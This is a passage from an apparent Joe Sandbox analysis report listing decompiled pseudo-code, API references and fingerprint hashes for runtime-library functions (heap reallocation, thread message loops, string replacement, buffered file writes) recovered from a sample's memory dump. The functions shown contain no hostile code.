								break;
							}
							__eflags = _t31;
							if(_t31 == 0) {
								_t31 = _t31 + 1;
								__eflags = _t31;
							}
							_t7 = HeapReAlloc( *0x510440, 0, _a4, _t31);
							_t20 = _t7;
							__eflags = _t20;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								__eflags =  *0x510ab0 - _t7;
								if(__eflags == 0) {
									_t9 = E00425208(__eflags);
									 *_t9 = E00425261(GetLastError());
									goto L17;
								} else {
									__eflags = E0042793D(_t7, _t31);
									if(__eflags == 0) {
										_t12 = E00425208(__eflags);
										 *_t12 = E00425261(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E0042793D(_t6, _t31);
						 *((intOrPtr*)(E00425208(__eflags))) = 0xc;
						goto L12;
					} else {
						E00420BED(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E00420C62(__ebx, __edx, __edi, _a8);
				}
			}

APIs

_malloc.LIBCMT ref: 0043B70B

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00620000,00000000,00000001,00000001,?,?,?,00430E81,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420CA5

_free.LIBCMT ref: 0043B71E

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: 8e512132b4ba77e80ced0f8d2c599a4ead77bd4eaf6f4183de6e41df743542ab
Instruction ID: cebe638eb0ed40525ab660a1b273922ca7a171140340163af9fc546bca46de76
Opcode Fuzzy Hash: 8e512132b4ba77e80ced0f8d2c599a4ead77bd4eaf6f4183de6e41df743542ab
Instruction Fuzzy Hash: F411EB31504725EBCB202B76BC85B6A3784DF58364F50512BFA589A291DB3C88408ADC

Uniqueness

Uniqueness Score: -1.00%

Function 0041F070 Relevance: 7.5, APIs: 5, Instructions: 49
windowsynchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041F070() {
				struct tagMSG _v32;
				long _t7;

				PostThreadMessageW( *0x51325c, 0x12, 0, 0);
				do {
					while(PeekMessageW( &_v32, 0, 0, 0, 1) != 0) {
						DispatchMessageW( &_v32);
					}
					_t7 = WaitForSingleObject( *0x513260, 0xa);
				} while (_t7 == 0x102);
				 *0x513260 = 0;
				 *0x51325c = 0;
				return _t7;
			}

0x0041f085
0x0041f0a0
0x0041f0b0
0x0041f0b6
0x0041f0c6
0x0041f0d2
0x0041f0d4
0x0041f0dd
0x0041f0e7
0x0041f0f5

APIs

PostThreadMessageW.USER32 ref: 0041F085
PeekMessageW.USER32 ref: 0041F0AC
DispatchMessageW.USER32 ref: 0041F0B6
PeekMessageW.USER32 ref: 0041F0C4
WaitForSingleObject.KERNEL32(0000000A), ref: 0041F0D2

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Message$Peek$DispatchObjectPostSingleThreadWait
String ID:
API String ID: 1380987712-0
Opcode ID: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
Instruction ID: 8330a25206e7a7c758b309db49295e470543d34b7ed76d4368c5dbe794fa98e6
Opcode Fuzzy Hash: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
Instruction Fuzzy Hash: 5C01DB35A4030876EB30AB55EC86FD63B6DE744B00F148022FE04AB1E1D7B9A54ADB98

Uniqueness

Uniqueness Score: -1.00%

Function 0041E500 Relevance: 7.5, APIs: 5, Instructions: 49
windowsynchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041E500() {
				struct tagMSG _v32;
				long _t7;

				PostThreadMessageW( *0x513258, 0x12, 0, 0);
				do {
					while(PeekMessageW( &_v32, 0, 0, 0, 1) != 0) {
						DispatchMessageW( &_v32);
					}
					_t7 = WaitForSingleObject( *0x513254, 0xa);
				} while (_t7 == 0x102);
				 *0x513254 = 0;
				 *0x513258 = 0;
				return _t7;
			}

0x0041e515
0x0041e530
0x0041e540
0x0041e546
0x0041e556
0x0041e562
0x0041e564
0x0041e56d
0x0041e577
0x0041e585

APIs

PostThreadMessageW.USER32 ref: 0041E515
PeekMessageW.USER32 ref: 0041E53C
DispatchMessageW.USER32 ref: 0041E546
PeekMessageW.USER32 ref: 0041E554
WaitForSingleObject.KERNEL32(0000000A), ref: 0041E562

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Message$Peek$DispatchObjectPostSingleThreadWait
String ID:
API String ID: 1380987712-0
Opcode ID: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
Instruction ID: 59d9cfd0379212e31388a7928d285390ad7449125cd170d7d310b1f6820545b5
Opcode Fuzzy Hash: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
Instruction Fuzzy Hash: 3301DB35B4030976E720AB51EC86FD67B6DE744B04F144011FE04AB1E1D7F9A549CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0041FA40 Relevance: 7.5, APIs: 5, Instructions: 48
windowsynchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041FA40(long* __ecx) {
				struct tagMSG _v32;
				long _t9;
				struct HWND__** _t14;

				_t14 = __ecx;
				PostThreadMessageW( *__ecx, 0x12, 0, 0);
				do {
					while(PeekMessageW( &_v32, 0, 0, 0, 1) != 0) {
						DispatchMessageW( &_v32);
					}
					_t9 = WaitForSingleObject(_t14[1], 0xa);
				} while (_t9 == 0x102);
				_t14[1] = 0;
				 *_t14 = 0;
				return _t9;
			}

0x0041fa4b
0x0041fa53
0x0041fa65
0x0041fa75
0x0041fa7b
0x0041fa8b
0x0041fa94
0x0041fa9a
0x0041faa3
0x0041faaa
0x0041fab4

APIs

PostThreadMessageW.USER32 ref: 0041FA53
PeekMessageW.USER32 ref: 0041FA71
DispatchMessageW.USER32 ref: 0041FA7B
PeekMessageW.USER32 ref: 0041FA89
WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FA94

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Message$Peek$DispatchObjectPostSingleThreadWait
String ID:
API String ID: 1380987712-0
Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
Instruction ID: 7dc02704ba958b7d98511173c4623a4fa8f2b4100db45197b38ae147ea501182
Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
Instruction Fuzzy Hash: 6301AE31B4030577EB205B55DC86FA73B6DDB44B40F544061FB04EE1D1D7F9984587A4

Uniqueness

Uniqueness Score: -1.00%

Function 0041FDF0 Relevance: 7.5, APIs: 5, Instructions: 48
windowsynchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041FDF0(long* __ecx) {
				struct tagMSG _v32;
				long _t9;
				struct HWND__** _t14;

				_t14 = __ecx;
				PostThreadMessageW( *__ecx, 0x12, 0, 0);
				do {
					while(PeekMessageW( &_v32, 0, 0, 0, 1) != 0) {
						DispatchMessageW( &_v32);
					}
					_t9 = WaitForSingleObject(_t14[1], 0xa);
				} while (_t9 == 0x102);
				_t14[1] = 0;
				 *_t14 = 0;
				return _t9;
			}

0x0041fdfb
0x0041fe03
0x0041fe15
0x0041fe25
0x0041fe2b
0x0041fe3b
0x0041fe44
0x0041fe4a
0x0041fe53
0x0041fe5a
0x0041fe64

APIs

PostThreadMessageW.USER32 ref: 0041FE03
PeekMessageW.USER32 ref: 0041FE21
DispatchMessageW.USER32 ref: 0041FE2B
PeekMessageW.USER32 ref: 0041FE39
WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FE44

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Message$Peek$DispatchObjectPostSingleThreadWait
String ID:
API String ID: 1380987712-0
Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
Instruction ID: d705e8d6a79994c6a13c6d22e65b3a6180ae01e64e8e6a22fa5ca061b0d405f5
Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
Instruction Fuzzy Hash: 3501A931B80308B7EB205B95ED8AF973B6DEB44B00F144061FA04EF1E1D7F5A8468BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00417BA0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00417BA0(signed int __ebx, signed int __ecx, signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t101;
				signed int _t104;
				signed int _t107;
				signed int _t109;
				signed int _t111;
				signed int _t113;
				signed int _t116;
				intOrPtr _t122;
				intOrPtr _t128;
				intOrPtr* _t136;
				signed int _t137;
				intOrPtr* _t139;
				signed int _t146;
				intOrPtr _t154;
				signed int _t155;
				intOrPtr _t162;
				signed int _t171;
				signed int _t174;
				signed int _t176;
				signed int _t177;
				signed int _t180;
				intOrPtr* _t186;
				signed int _t187;
				signed int _t191;
				intOrPtr _t196;
				signed int _t199;
				signed int _t200;
				intOrPtr _t204;
				signed int _t206;
				intOrPtr* _t207;
				void* _t209;
				signed int _t210;
				intOrPtr* _t211;
				intOrPtr* _t212;
				intOrPtr* _t215;
				void* _t217;
				signed int _t218;
				signed int _t219;
				signed int _t221;
				signed int _t222;
				intOrPtr _t223;
				void* _t224;
				signed int _t233;
				signed int _t238;
				intOrPtr* _t239;
				signed int _t241;
				void* _t250;
				void* _t252;
				void* _t253;

				_t176 = __ebx;
				_push(__ecx);
				_t206 = _a12;
				_t238 = __ecx;
				_push(_t221);
				if(_t206 == 0) {
					L13:
					_t186 =  *((intOrPtr*)(_t238 + 0x10));
					_t101 = _a4;
					__eflags = _t186 - _t101;
					if(__eflags < 0) {
						_push("invalid string position");
						E0044F26C(__eflags);
						goto L46;
					} else {
						_t233 = _a8;
						_t217 = _t186 - _t101;
						__eflags = _t217 - _t233;
						_push(_t176);
						_t176 = _a16;
						_t221 =  <  ? _t217 : _t233;
						_t186 = _t186 - _t221;
						__eflags = (_t101 | 0xffffffff) - _t176 - _t186;
						if(__eflags <= 0) {
							L46:
							_push("string too long");
							E0044F23E(__eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_t250 = _t252;
							_t253 = _t252 - 8;
							_push(_t238);
							_push(_t221);
							_t222 = _v12;
							_t239 = _t186;
							__eflags = _t222;
							if(_t222 == 0) {
								L60:
								_t104 =  *(_t239 + 0x10);
								_t187 = _v0;
								__eflags = _t104 - _t187;
								if(__eflags < 0) {
									_push("invalid string position");
									E0044F26C(__eflags);
									goto L91;
								} else {
									_t209 = _t104 - _t187;
									_t187 = _a12;
									_push(_t176);
									_t180 = _a4;
									__eflags = _t209 - _t180;
									_t176 =  <  ? _t209 : _t180;
									_t113 = _t104 - _t176;
									_a4 = _t113;
									__eflags = (_t113 | 0xffffffff) - _t187 - _a4;
									if(__eflags <= 0) {
										L91:
										_push("string too long");
										E0044F23E(__eflags);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t250);
										_push(_t176);
										_push(_t239);
										_push(_t222);
										_t223 = _v44;
										__eflags =  *((intOrPtr*)(_t187 + 0x10)) - _t223;
										_t224 =  <  ?  *((void*)(_t187 + 0x10)) : _t223;
										__eflags =  *((intOrPtr*)(_t187 + 0x14)) - 8;
										if( *((intOrPtr*)(_t187 + 0x14)) >= 8) {
											_t187 =  *_t187;
										}
										_t177 = _a8;
										__eflags = _t224 - _t177;
										_t241 =  <  ? _t224 : _t177;
										__eflags = _t241;
										if(_t241 == 0) {
											L98:
											_t107 = 0;
											__eflags = 0;
										} else {
											_t207 = _a4;
											while(1) {
												__eflags =  *_t187 -  *_t207;
												if( *_t187 !=  *_t207) {
													break;
												}
												_t187 = _t187 + 2;
												_t207 = _t207 + 2;
												_t241 = _t241 - 1;
												__eflags = _t241;
												if(_t241 != 0) {
													continue;
												} else {
													goto L98;
												}
												goto L99;
											}
											_t111 =  *_t187 & 0x0000ffff;
											__eflags = _t111 -  *_t207;
											asm("sbb eax, eax");
											_t107 = (_t111 & 0xfffffffe) + 1;
										}
										L99:
										__eflags = _t107;
										if(_t107 != 0) {
											L104:
											return _t107;
										} else {
											__eflags = _t224 - _t177;
											if(_t224 >= _t177) {
												__eflags = _t224 - _t177;
												_t100 = _t224 != _t177;
												__eflags = _t100;
												_t107 = 0 | _t100;
												goto L104;
											} else {
												_t109 = _t107 | 0xffffffff;
												__eflags = _t109;
												return _t109;
											}
										}
									} else {
										_t210 = _t209 - _t176;
										_v16 = _t210;
										__eflags = _t187 - _t176;
										if(_t187 < _t176) {
											_t128 =  *((intOrPtr*)(_t239 + 0x14));
											__eflags = _t128 - 8;
											if(_t128 < 8) {
												_a4 = _t239;
											} else {
												_a4 =  *_t239;
												_t222 = _a8;
											}
											__eflags = _t128 - 8;
											if(_t128 < 8) {
												_v12 = _t239;
											} else {
												_v12 =  *_t239;
											}
											__eflags = _t210;
											if(_t210 != 0) {
												E004205A0(_v12 + (_v0 + _t187) * 2, _a4 + (_v0 + _t176) * 2, _t210 + _t210);
												_t222 = _a8;
												_t253 = _t253 + 0xc;
												_t187 = _a12;
											}
										}
										__eflags = _t187;
										if(_t187 != 0) {
											L73:
											_a4 = _t187 - _t176 +  *(_t239 + 0x10);
											_t116 = E00415D50(_t176, _t239, _t222, _t239, _t187 - _t176 +  *(_t239 + 0x10), 0);
											__eflags = _t116;
											if(_t116 != 0) {
												_t191 = _a12;
												__eflags = _t176 - _t191;
												if(_t176 >= _t191) {
													_t182 = _v0;
												} else {
													_t122 =  *((intOrPtr*)(_t239 + 0x14));
													__eflags = _t122 - 8;
													if(_t122 < 8) {
														_t212 = _t239;
													} else {
														_t212 =  *_t239;
													}
													__eflags = _t122 - 8;
													if(_t122 < 8) {
														_a8 = _t239;
													} else {
														_a8 =  *_t239;
													}
													_t182 = _v0;
													E0040B600(_a8 + (_v0 + _t191) * 2, _t212 + (_v0 + _t176) * 2, _v16);
													_t191 = _a12;
													_t253 = _t253 + 4;
												}
												__eflags =  *((intOrPtr*)(_t239 + 0x14)) - 8;
												if( *((intOrPtr*)(_t239 + 0x14)) < 8) {
													_t211 = _t239;
												} else {
													_t211 =  *_t239;
												}
												__eflags = _t191;
												if(_t191 != 0) {
													E0042D8D0(_t211 + _t182 * 2, _t222, _t191 + _t191);
												}
												E00414DF0(_t239, _a4);
											}
										} else {
											__eflags = _t176;
											if(_t176 != 0) {
												goto L73;
											}
										}
										return _t239;
									}
								}
							} else {
								_t196 =  *((intOrPtr*)(_t239 + 0x14));
								__eflags = _t196 - 8;
								if(_t196 < 8) {
									_t136 = _t239;
								} else {
									_t136 =  *_t239;
								}
								__eflags = _t222 - _t136;
								if(_t222 < _t136) {
									goto L60;
								} else {
									__eflags = _t196 - 8;
									if(_t196 < 8) {
										_t215 = _t239;
									} else {
										_t215 =  *_t239;
									}
									_t137 =  *(_t239 + 0x10);
									__eflags = _t215 + _t137 * 2 - _t222;
									if(_t215 + _t137 * 2 <= _t222) {
										goto L60;
									} else {
										__eflags = _t196 - 8;
										if(_t196 < 8) {
											_t139 = _t239;
										} else {
											_t139 =  *_t239;
										}
										__eflags = _t222 - _t139;
										return E00414920(_t176, _t239, _t222 - _t139 >> 1, _t239, _v0, _a4, _t239, _t222 - _t139 >> 1, _a12);
									}
								}
							}
						} else {
							_t218 = _t217 - _t221;
							_v8 = _t218;
							__eflags = _t176 - _t221;
							if(_t176 < _t221) {
								_t162 =  *((intOrPtr*)(_t238 + 0x14));
								__eflags = _t162 - 0x10;
								if(_t162 < 0x10) {
									_a8 = _t238;
								} else {
									_a8 =  *_t238;
								}
								__eflags = _t162 - 0x10;
								if(_t162 < 0x10) {
									_a16 = _t238;
								} else {
									_a16 =  *_t238;
								}
								__eflags = _t218;
								if(_t218 != 0) {
									__eflags = _a16 + _a4 + _t176;
									E004205A0(_a16 + _a4 + _t176, _a8 + _a4 + _t221, _t218);
									_t252 = _t252 + 0xc;
								}
							}
							__eflags = _t176;
							if(_t176 != 0) {
								L26:
								_push(0);
								_a16 = _t176 - _t221 +  *((intOrPtr*)(_t238 + 0x10));
								_t146 = E00415810(_t176, _t238, _t221, _t176 - _t221 +  *((intOrPtr*)(_t238 + 0x10)));
								__eflags = _t146;
								if(_t146 == 0) {
									goto L44;
								} else {
									__eflags = _t221 - _t176;
									if(_t221 < _t176) {
										_t154 =  *((intOrPtr*)(_t238 + 0x14));
										__eflags = _t154 - 0x10;
										if(_t154 < 0x10) {
											_a8 = _t238;
										} else {
											_a8 =  *_t238;
										}
										__eflags = _t154 - 0x10;
										if(_t154 < 0x10) {
											_t219 = _t238;
										} else {
											_t219 =  *_t238;
										}
										_t155 = _v8;
										__eflags = _t155;
										if(_t155 != 0) {
											__eflags = _t219 + _a4 + _t176;
											E004205A0(_t219 + _a4 + _t176, _a8 + _a4 + _t221, _t155);
											_t252 = _t252 + 0xc;
										}
									}
									__eflags =  *((intOrPtr*)(_t238 + 0x14)) - 0x10;
									if( *((intOrPtr*)(_t238 + 0x14)) < 0x10) {
										_t199 = _t238;
									} else {
										_t199 =  *_t238;
									}
									__eflags = _t176;
									if(_t176 != 0) {
										__eflags = _a4 + _t199;
										E0042D8D0(_a4 + _t199, _a12, _t176);
									}
									__eflags =  *((intOrPtr*)(_t238 + 0x14)) - 0x10;
									_t200 = _a16;
									 *((intOrPtr*)(_t238 + 0x10)) = _t200;
									if( *((intOrPtr*)(_t238 + 0x14)) < 0x10) {
										 *((char*)(_t238 + _t200)) = 0;
										goto L44;
									} else {
										 *((char*)( *_t238 + _t200)) = 0;
										return _t238;
									}
								}
							} else {
								__eflags = _t221;
								if(_t221 == 0) {
									L44:
									return _t238;
								} else {
									goto L26;
								}
							}
						}
					}
				} else {
					_t204 =  *((intOrPtr*)(__ecx + 0x14));
					if(_t204 < 0x10) {
						_t171 = __ecx;
					} else {
						_t171 =  *((intOrPtr*)(__ecx));
					}
					if(_t206 < _t171) {
						goto L13;
					} else {
						if(_t204 < 0x10) {
							_t221 = _t238;
						} else {
							_t221 =  *_t238;
						}
						if( *((intOrPtr*)(_t238 + 0x10)) + _t221 <= _t206) {
							goto L13;
						} else {
							if(_t204 < 0x10) {
								_t174 = _t238;
							} else {
								_t174 =  *_t238;
							}
							return E00418000(_t176, _t238, _t221, _t238, _a4, _a8, _t238, _t206 - _t174, _a16);
						}
					}
				}
			}

APIs

_memmove.LIBCMT ref: 00417C6A
_memmove.LIBCMT ref: 00417CD4

Strings

string too long, xrefs: 00417D36
invalid string position, xrefs: 00417D2C

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: 3e8e620cdafad959620aa8092266a2dd437b35ec9cc4a24f81571b5e96538b17
Instruction ID: 16eedd03d570a769cf24423414cb71a1906862ef28ca1dd771941f38c47b8a04
Opcode Fuzzy Hash: 3e8e620cdafad959620aa8092266a2dd437b35ec9cc4a24f81571b5e96538b17
Instruction Fuzzy Hash: C451C3317081089BDB24CE1CD980AAA77B6EF85714B24891FF856CB381DB35EDD18BD9

Uniqueness

Uniqueness Score: -1.00%

Function 004229A9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E004229A9(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t49;
				signed int _t50;
				void* _t57;
				signed int _t59;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t73;
				signed int _t74;
				signed int _t79;
				signed int _t87;
				signed int _t92;
				intOrPtr* _t96;
				void* _t97;

				_push(_t72);
				_t73 = _a8;
				if(_t73 == 0) {
					L4:
					_t50 = 0;
					L5:
					return _t50;
				}
				_t70 = _a12;
				if(_t70 == 0) {
					goto L4;
				}
				_t96 = _a16;
				_t100 = _t96;
				if(_t96 != 0) {
					__eflags = _a4;
					if(__eflags == 0) {
						goto L3;
					}
					__eflags = _t70 - (_t49 | 0xffffffff) / _t73;
					if(__eflags > 0) {
						goto L3;
					}
					_t92 = _t73 * _t70;
					__eflags =  *(_t96 + 0xc) & 0x0000010c;
					_t71 = _t92;
					if(( *(_t96 + 0xc) & 0x0000010c) == 0) {
						_t74 = 0x1000;
					} else {
						_t74 =  *(_t96 + 0x18);
					}
					_v8 = _t74;
					__eflags = _t92;
					if(_t92 == 0) {
						L34:
						_t50 = _a12;
						goto L5;
					} else {
						do {
							_t84 =  *(_t96 + 0xc) & 0x00000108;
							__eflags = _t84;
							if(_t84 == 0) {
								L18:
								__eflags = _t71 - _t74;
								if(_t71 < _t74) {
									_t57 = E004264EF( *_a4, _t96);
									__eflags = _t57 - 0xffffffff;
									if(_t57 == 0xffffffff) {
										L36:
										_t50 = (_t92 - _t71) / _a8;
										goto L5;
									}
									_a4 = _a4 + 1;
									_t71 = _t71 - 1;
									_t74 =  *(_t96 + 0x18);
									_v8 = _t74;
									__eflags = _t74;
									if(_t74 <= 0) {
										_t74 = 1;
										__eflags = 1;
										_v8 = 1;
									}
									goto L33;
								}
								__eflags = _t84;
								if(_t84 == 0) {
									L22:
									_t59 = _t71;
									__eflags = _t74;
									if(_t74 == 0) {
										_v12 = _t71;
									} else {
										_t84 = _t59 % _t74;
										_t59 = _t71 - _t59 % _t74;
										_v12 = _t59;
									}
									_push(_t59);
									_push(_a4);
									_push(E0042816B(_t96));
									_t61 = E0042DF14(_t71, _t84, _t92, _t96, __eflags);
									_t97 = _t97 + 0xc;
									__eflags = _t61 - 0xffffffff;
									if(_t61 == 0xffffffff) {
										L35:
										_t43 = _t96 + 0xc;
										 *_t43 =  *(_t96 + 0xc) | 0x00000020;
										__eflags =  *_t43;
										goto L36;
									} else {
										_t79 = _v12;
										_t87 = _t79;
										__eflags = _t61 - _t79;
										if(_t61 <= _t79) {
											_t87 = _t61;
										}
										_a4 = _a4 + _t87;
										_t71 = _t71 - _t87;
										__eflags = _t61 - _t79;
										if(_t61 < _t79) {
											goto L35;
										} else {
											L29:
											_t74 = _v8;
											goto L33;
										}
									}
								}
								_t62 = E0042836B(_t84, _t96);
								__eflags = _t62;
								if(_t62 != 0) {
									goto L36;
								}
								_t74 = _v8;
								goto L22;
							}
							_t63 =  *(_t96 + 4);
							_v12 = _t63;
							__eflags = _t63;
							if(__eflags == 0) {
								goto L18;
							}
							if(__eflags < 0) {
								goto L35;
							}
							__eflags = _t71 - _t63;
							if(_t71 < _t63) {
								_t63 = _t71;
								_v12 = _t71;
							}
							E0042D8D0( *_t96, _a4, _t63);
							_t65 = _v12;
							_t97 = _t97 + 0xc;
							 *(_t96 + 4) =  *(_t96 + 4) - _t65;
							_t71 = _t71 - _t65;
							 *_t96 =  *_t96 + _t65;
							_a4 = _a4 + _t65;
							goto L29;
							L33:
							__eflags = _t71;
						} while (_t71 != 0);
						goto L34;
					}
				}
				L3:
				 *((intOrPtr*)(E00425208(_t100))) = 0x16;
				E004242D2();
				goto L4;
			}

0x004229ad
0x004229ae
0x004229b6
0x004229d6
0x004229d6
0x004229d8
0x004229de
0x004229de
0x004229b8
0x004229bd
0x00000000
0x00000000
0x004229bf
0x004229c2
0x004229c4
0x004229df
0x004229e3
0x00000000
0x00000000
0x004229ec
0x004229ee
0x00000000
0x00000000
0x004229f2
0x004229f5
0x004229fc
0x004229fe
0x00422a05
0x00422a00
0x00422a00
0x00422a00
0x00422a0a
0x00422a0d
0x00422a0f
0x00422ae8
0x00422ae8
0x00000000
0x00422a15
0x00422a15
0x00422a18
0x00422a18
0x00422a1e
0x00422a56
0x00422a56
0x00422a58
0x00422ac0
0x00422ac7
0x00422aca
0x00422af4
0x00422afa
0x00000000
0x00422afa
0x00422acc
0x00422acf
0x00422ad0
0x00422ad3
0x00422ad6
0x00422ad8
0x00422adc
0x00422adc
0x00422add
0x00422add
0x00000000
0x00422ad8
0x00422a5a
0x00422a5c
0x00422a70
0x00422a70
0x00422a72
0x00422a74
0x00422a83
0x00422a76
0x00422a78
0x00422a7c
0x00422a7e
0x00422a7e
0x00422a86
0x00422a87
0x00422a91
0x00422a92
0x00422a97
0x00422a9a
0x00422a9d
0x00422af0
0x00422af0
0x00422af0
0x00422af0
0x00000000
0x00422a9f
0x00422a9f
0x00422aa2
0x00422aa4
0x00422aa6
0x00422aa8
0x00422aa8
0x00422aaa
0x00422aad
0x00422aaf
0x00422ab1
0x00000000
0x00422ab3
0x00422ab3
0x00422ab3
0x00000000
0x00422ab3
0x00422ab1
0x00422a9d
0x00422a5f
0x00422a65
0x00422a67
0x00000000
0x00000000
0x00422a6d
0x00000000
0x00422a6d
0x00422a20
0x00422a23
0x00422a26
0x00422a28
0x00000000
0x00000000
0x00422a2a
0x00000000
0x00000000
0x00422a30
0x00422a32
0x00422a34
0x00422a36
0x00422a36
0x00422a3f
0x00422a44
0x00422a47
0x00422a4a
0x00422a4d
0x00422a4f
0x00422a51
0x00000000
0x00422ae0
0x00422ae0
0x00422ae0
0x00000000
0x00422a15
0x00422a0f
0x004229c6
0x004229cb
0x004229d1
0x00000000

APIs

__flush.LIBCMT ref: 00422A5F
__write.LIBCMT ref: 00422A92
__flsbuf.LIBCMT ref: 00422AC0

Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208

Strings

A, xrefs: 00422AB8, 00422A3A, 00422A9F, 00422A87, 00422A44

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

